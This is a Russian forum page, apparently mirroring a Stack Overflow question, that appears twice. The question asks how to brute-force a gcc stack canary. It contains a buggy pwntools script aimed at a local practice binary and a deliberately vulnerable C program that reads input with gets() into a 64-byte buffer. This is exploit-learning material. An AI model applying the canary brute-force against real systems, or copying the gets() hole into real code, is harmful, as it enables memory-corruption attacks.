Мобильная версияgcc реализовал защиту стека, чтобы защитить программы от переполнения буфера. Я хочу знать, возможно ли (и если да, то как) воспользоваться этим и запустить переполнение буфера. Я создал простой скрипт Python, который должен перебрать канарейку:
from pwn import *
import os
canary = ""
byte = 0x00
def brute():
global canary
global byte
while byte != 0xff:
p = process("./vuln")
p.sendline("A"*64 + canary + chr(byte))
reply=p.recvall()
if "***" in reply:
byte += 1
else:
canary += chr(byte)
byte = 0x00
break
brute()
brute()
brute()
brute()
print "Canary: \\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
Результат: Канарейка: \x0a\x00\x00\x00 и это явно не канарейка.
Двоичный файл раньше я хакал:
#include
#include
#include
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
Подробнее здесь: https://stackoverflow.com/questions/588 ... ack-canary
Как перебрать стек канарейку ⇐ Python
Программы на Python
1735942672
Anonymous
gcc реализовал защиту стека, чтобы защитить программы от переполнения буфера. Я хочу знать, возможно ли (и если да, то как) воспользоваться этим и запустить переполнение буфера. Я создал простой скрипт Python, который должен перебрать канарейку:
from pwn import *
import os
canary = ""
byte = 0x00
def brute():
global canary
global byte
while byte != 0xff:
p = process("./vuln")
p.sendline("A"*64 + canary + chr(byte))
reply=p.recvall()
if "***" in reply:
byte += 1
else:
canary += chr(byte)
byte = 0x00
break
brute()
brute()
brute()
brute()
print "Canary: \\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
Результат: Канарейка: \x0a\x00\x00\x00 и это явно не канарейка.
Двоичный файл раньше я хакал:
#include
#include
#include
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
Подробнее здесь: [url]https://stackoverflow.com/questions/58843687/how-to-bruteforce-the-stack-canary[/url]
Ответить
1 сообщение
• Страница 1 из 1
Перейти
- Кемерово-IT
- ↳ Javascript
- ↳ C#
- ↳ JAVA
- ↳ Elasticsearch aggregation
- ↳ Python
- ↳ Php
- ↳ Android
- ↳ Html
- ↳ Jquery
- ↳ C++
- ↳ IOS
- ↳ CSS
- ↳ Excel
- ↳ Linux
- ↳ Apache
- ↳ MySql
- Детский мир
- Для души
- ↳ Музыкальные инструменты даром
- ↳ Печатная продукция даром
- Внешняя красота и здоровье
- ↳ Одежда и обувь для взрослых даром
- ↳ Товары для здоровья
- ↳ Физкультура и спорт
- Техника - даром!
- ↳ Автомобилистам
- ↳ Компьютерная техника
- ↳ Плиты: газовые и электрические
- ↳ Холодильники
- ↳ Стиральные машины
- ↳ Телевизоры
- ↳ Телефоны, смартфоны, плашеты
- ↳ Швейные машинки
- ↳ Прочая электроника и техника
- ↳ Фототехника
- Ремонт и интерьер
- ↳ Стройматериалы, инструмент
- ↳ Мебель и предметы интерьера даром
- ↳ Cантехника
- Другие темы
- ↳ Разное даром
- ↳ Давай меняться!
- ↳ Отдам\возьму за копеечку
- ↳ Работа и подработка в Кемерове
- ↳ Давай с тобой поговорим...
